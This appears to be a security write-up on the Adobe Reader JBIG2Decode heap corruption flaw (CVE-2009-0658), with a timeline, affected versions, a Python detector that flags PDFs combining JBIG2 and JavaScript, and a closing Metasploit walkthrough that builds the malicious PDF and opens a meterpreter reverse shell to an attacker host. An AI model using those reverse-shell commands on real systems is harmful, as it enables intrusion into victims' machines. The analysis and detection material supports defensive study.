Timeline :
Exploit discovered in the wild on 2009-02-19
Milw0rm PoC provided by Guido Landi on 2009-02-23
Metasploit PoC provided by Nathan Keltner on 2009-03-26
PoC provided by:
natron
xort
redsand
MC
Didier Stevens
Reference(s) :
CVE-2009-0658
Affected versions :
Adobe Reader and Adobe Acrobat Professional 9.0.0
Adobe Reader and Adobe Acrobat Professional prior to version 8.1.4
Adobe Reader and Adobe Acrobat Professional prior to version 7.1.1
Tested on Windows XP SP3 with Adobe Reader 9.0.0
Description :
This module exploits a heap-based pointer corruption flaw in Adobe Reader 9.0.0 and earlier. This module relies upon JavaScript for the heap spray.
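A triage heuristic for the pairing described above, a /JBIG2Decode filter together with JavaScript in the same PDF. This is an added example, not code from the original page or from Metasploit: it counts PDF name tokens after undoing #xx name escapes. The sample byte strings are constructed, and the function names and verdict labels are assumptions.

```python
import re

# Name tokens that matter for this bug class.
WATCHED = ("/JBIG2Decode", "/JS", "/JavaScript", "/OpenAction")

# A PDF name: "/" followed by regular characters (no whitespace, no delimiters).
_NAME = re.compile(rb"/[^\x00\t\n\x0c\r ()<>\[\]{}/%]+")
_HEX = re.compile(rb"#([0-9A-Fa-f]{2})")

# Constructed samples: object skeletons only, no stream data and no script.
SAMPLE_SCAN = (b"%PDF-1.4\n1 0 obj\n<< /Type /XObject /Subtype /Image "
               b"/Filter /JBIG2Decode /Length 0 >>\nendobj\n")
SAMPLE_FLAGGED = (b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog /OpenAction 2 0 R >>\n"
                  b"endobj\n2 0 obj\n<< /S /JavaScript /JS 4 0 R >>\nendobj\n"
                  b"3 0 obj\n<< /Filter /JBIG#32Decode /Length 0 >>\nendobj\n")


def decode_name(raw: bytes) -> str:
    """Undo #xx escapes in a PDF name, e.g. /JBIG#32Decode -> /JBIG2Decode."""
    return _HEX.sub(lambda m: bytes([int(m.group(1), 16)]), raw).decode("latin-1")


def count_names(data: bytes) -> dict:
    """Count occurrences of the watched names in raw PDF bytes."""
    counts = dict.fromkeys(WATCHED, 0)
    for m in _NAME.finditer(data):
        name = decode_name(m.group(0))
        if name in counts:
            counts[name] += 1
    return counts


def triage(data: bytes) -> str:
    """'suspicious' = JBIG2 filter plus JavaScript; 'review' = either one alone."""
    c = count_names(data)
    has_js = c["/JS"] > 0 or c["/JavaScript"] > 0
    has_jbig2 = c["/JBIG2Decode"] > 0
    if has_jbig2 and has_js:
        return "suspicious"
    if has_jbig2 or has_js:
        return "review"
    return "clean"


if __name__ == "__main__":
    for label, blob in (("scan", SAMPLE_SCAN), ("flagged", SAMPLE_FLAGGED)):
        print(label, triage(blob), count_names(blob))
```

Names stored inside compressed object streams are not visible to this scan, so a "clean" verdict on a file that is otherwise suspect calls for inflating its streams and scanning again.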
Metasploit demo :
use exploit/windows/fileformat/adobe_jbig2decode
set OUTPUTPATH /home/eromang
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j
sessions -i 1
sysinfo
getuid
ipconfig
Owned !